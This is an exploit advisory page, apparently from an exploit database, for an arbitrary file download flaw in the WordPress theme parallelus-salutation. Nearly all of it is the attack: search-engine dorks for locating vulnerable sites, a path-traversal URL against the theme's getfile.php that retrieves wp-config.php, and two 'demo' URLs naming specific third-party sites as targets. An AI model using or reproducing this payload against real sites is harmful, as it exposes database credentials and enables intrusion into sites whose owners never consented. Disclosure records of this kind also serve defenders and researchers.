WordPress theme parallelus-salutation Arbitrary File Download Vulnerability

2015.11.29
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################## # Exploit Title: WordPress theme parallelus-salutation Arbitrary File Download Vulnerability . # # Exploit Author: Iran Cyber Security Group # # Discovered By: injector # # Dork 1: inurl:themes/parallelus-salutation/ # # Dork 2: inurl:themes/parallelus-salutation/framework/ # # Date: 18-12-2014 # # Tested on: Kali, Win7 # # Category: webapps # # platform: php ############################################################## VULNERABILITY ############## [~] VULNERABILITY}~~ [~] http://www.Site.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php ############## demo 1: www.scarabreseaXrch.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php demo 2: http://www.patcXhingprotocol.com/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php ##############################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top